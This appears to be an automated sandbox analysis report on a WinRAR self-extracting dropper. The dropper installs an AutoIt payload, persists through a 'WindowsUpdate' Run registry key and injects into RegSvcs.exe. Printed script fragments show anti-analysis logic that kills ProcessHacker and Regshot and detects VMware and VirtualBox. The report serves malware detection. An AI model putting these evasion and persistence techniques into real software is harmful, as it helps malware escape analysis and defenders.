                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: u549ed5dEA.exeStatic file information: File size 1323723 > 1048576
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: u549ed5dEA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: u549ed5dEA.exe
                Source: Binary string: UserAccountControlSettings.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.3279041422.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UserAccountControlSettings.pdb source: RegSvcs.exe, 0000000E.00000002.3279041422.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.3279217557.00000000013F0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.3279217557.00000000013F0000.00000040.00001000.00020000.00000000.sdmp
                Source: u549ed5dEA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: u549ed5dEA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: u549ed5dEA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: u549ed5dEA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: u549ed5dEA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E85D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00E85D78
                Source: C:\Users\user\Desktop\u549ed5dEA.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_3835765Jump to behavior
                Source: u549ed5dEA.exeStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB6680 push ecx; ret 0_2_00CB6693
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB5773 push ecx; ret 0_2_00CB5786
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00ED0332 push edi; ret 8_2_00ED0333
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA0E06 push ecx; ret 8_2_00EA0E19
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040D17A push ds; retf 14_2_0040D17B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004052D2 push ebx; ret 14_2_004052D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00417A9B push cs; iretd 14_2_00417A9D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041836D push F20F6127h; retf 14_2_00418372
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00403440 push eax; ret 14_2_00403442
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00414E3E push 00000056h; retf 14_2_00414E47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_013F225F pushad ; ret 14_2_013F27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_013F27FA pushad ; ret 14_2_013F27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014209AD push ecx; mov dword ptr [esp], ecx14_2_014209B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_013F283D push eax; iretd 14_2_013F2858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_013F135E push eax; iretd 14_2_013F1369

                Persistence and Installation Behavior

                barindex
                Uses ipconfig to lookup or modify the Windows network settings
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Users\user\Desktop\u549ed5dEA.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2File created: C:\Users\user\ruum\avqj.mp2Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2File created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2File created: C:\Users\user\ruum\avqj.mp2.exeJump to dropped file
                Source: C:\Users\user\ruum\avqj.mp2.exeFile created: C:\Users\user\ruum\avqj.mp2.exe.exeJump to dropped file
                Source: C:\Users\user\Desktop\u549ed5dEA.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2File created: C:\Users\user\ruum\avqj.mp2Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00F125A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_00F125A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E9FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_00E9FC8A
                Source: C:\Users\user\Desktop\u549ed5dEA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM autoit script
                Source: Yara matchFile source: Process Memory Space: avqj.mp2 PID: 2828, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: avqj.mp2.exe PID: 6848, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: avqj.mp2.exe PID: 4676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: avqj.mp2.exe PID: 3836, type: MEMORYSTR
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_8-100052
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324470202.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327388664.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324547303.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324631526.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257801468.0000000001A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: avqj.mp2, 00000008.00000003.2212919638.0000000001135000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2325260581.0000000001152000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2212863084.0000000001124000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2325674821.0000000001155000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324286510.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324343541.000000000114A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324138339.000000000113E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2585039223.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2562461798.000000000113A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2528806871.000000000112E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2545485329.0000000001135000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324470202.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327388664.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324547303.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324631526.00000000011EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEB
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp, awggmrd.xls.0.dr, awggmrd.xls.8.drBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp, awggmrd.xls.0.dr, awggmrd.xls.8.drBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: avqj.mp2.exe, 0000000F.00000002.2587294602.00000000011E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE>
                Source: avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152454731.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129620002.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2993714478.0000000001A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE`
                Source: avqj.mp2.exe, 0000000F.00000003.2585039223.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2562461798.000000000113A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2528806871.000000000112E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2545485329.0000000001135000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2584786311.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2584661553.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2398511365.0000000001114000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2400061361.0000000001124000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587135995.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2584040457.0000000001142000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3120435066.00000000019C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: avqj.mp2.exe, 00000014.00000003.3257801468.0000000001A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEU
                Source: avqj.mp2, 00000008.00000003.2325674821.0000000001178000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2212863084.0000000001178000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327184645.0000000001178000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324138339.0000000001178000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2583954177.0000000001136000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2528806871.000000000112E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2545485329.0000000001135000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587101154.0000000001136000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2398511365.0000000001114000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2400061361.0000000001124000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3013560063.00000000019B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324470202.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000002.2327388664.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324547303.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324631526.00000000011EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587294602.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152454731.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129620002.0000000001A58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
                Source: avqj.mp2, 00000008.00000002.2327160058.0000000001153000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2212919638.0000000001135000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2325260581.0000000001152000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2212863084.0000000001124000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324286510.0000000001143000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324343541.000000000114A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324138339.000000000113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")H
                Source: avqj.mp2.exe, 0000000F.00000002.2587294602.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3004963004.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3152454731.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129620002.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.2993714478.0000000001A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
                Source: avqj.mp2.exe, 00000014.00000003.3257801468.0000000001A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESP
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp, awggmrd.xls.0.dr, awggmrd.xls.8.drBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0146096E rdtsc 14_2_0146096E
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2API coverage: 5.2 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.5 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\u549ed5dEA.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00C9F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00C9F826
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB1630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00CB1630
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CC1FF8 FindFirstFileExA,0_2_00CC1FF8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EEE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_00EEE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EED836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00EED836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EEDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00EEDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00EF9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00EFA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_00EFA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF65F1 FindFirstFileW,FindNextFileW,FindClose,8_2_00EF65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EBC642 FindFirstFileExW,8_2_00EBC642
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_00EF72E9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF7248 FindFirstFileW,FindClose,8_2_00EF7248
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF7247 FindFirstFileW,8_2_00EF7247
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB4E14 VirtualQuery,GetSystemInfo,0_2_00CB4E14
                Source: avqj.mp2, 00000008.00000003.2324138339.000000000113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: avqj.mp2.exe, 00000014.00000003.3257692602.00000000019AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
                Source: avqj.mp2, 00000008.00000003.2212919638.0000000001135000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2212863084.0000000001124000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324266736.0000000001137000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then{M
                Source: avqj.mp2.exe, 0000000F.00000003.2583805083.000000000116B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe*5
                Source: avqj.mp2.exe, 00000014.00000003.3257692602.00000000019AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.execroso
                Source: avqj.mp2, 00000008.00000003.2324138339.000000000113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then\<
                Source: avqj.mp2.exe, 0000000F.00000003.2562461798.0000000001168000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2584094552.0000000001172000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2583805083.000000000116B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2584722082.000000000117F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeG
                Source: avqj.mp2.exe, 00000014.00000003.3258604460.00000000019C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exee-
                Source: avqj.mp2, 00000008.00000003.2325418464.0000000001195000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeC73
                Source: avqj.mp2.exe, 00000013.00000003.3043097466.00000000019F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C7
                Source: avqj.mp2.exe, 00000013.00000003.3043097466.00000000019F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
                Source: avqj.mp2.exe, 0000000F.00000003.2584722082.000000000117F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exet
                Source: awggmrd.xls.8.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: avqj.mp2, 00000008.00000003.2325438490.0000000001193000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe<:
                Source: avqj.mp2.exe, 00000014.00000003.2701027029.0000000001964000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenIM2ev
                Source: avqj.mp2, 00000008.00000003.2325397298.000000000118E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2325438490.0000000001193000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeQ4
                Source: avqj.mp2.exe, 00000014.00000003.2701027029.0000000001964000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then6QFTv
                Source: awggmrd.xls.8.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: avqj.mp2.exe, 00000013.00000003.2570326128.00000000019A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then6QF
                Source: avqj.mp2, 00000008.00000003.2324138339.000000000113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then@p
                Source: avqj.mp2.exe, 00000014.00000003.3257351157.000000000196E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then6QF"
                Source: awggmrd.xls.8.drBinary or memory string: If ProcessExists("VboxService.exe") Then
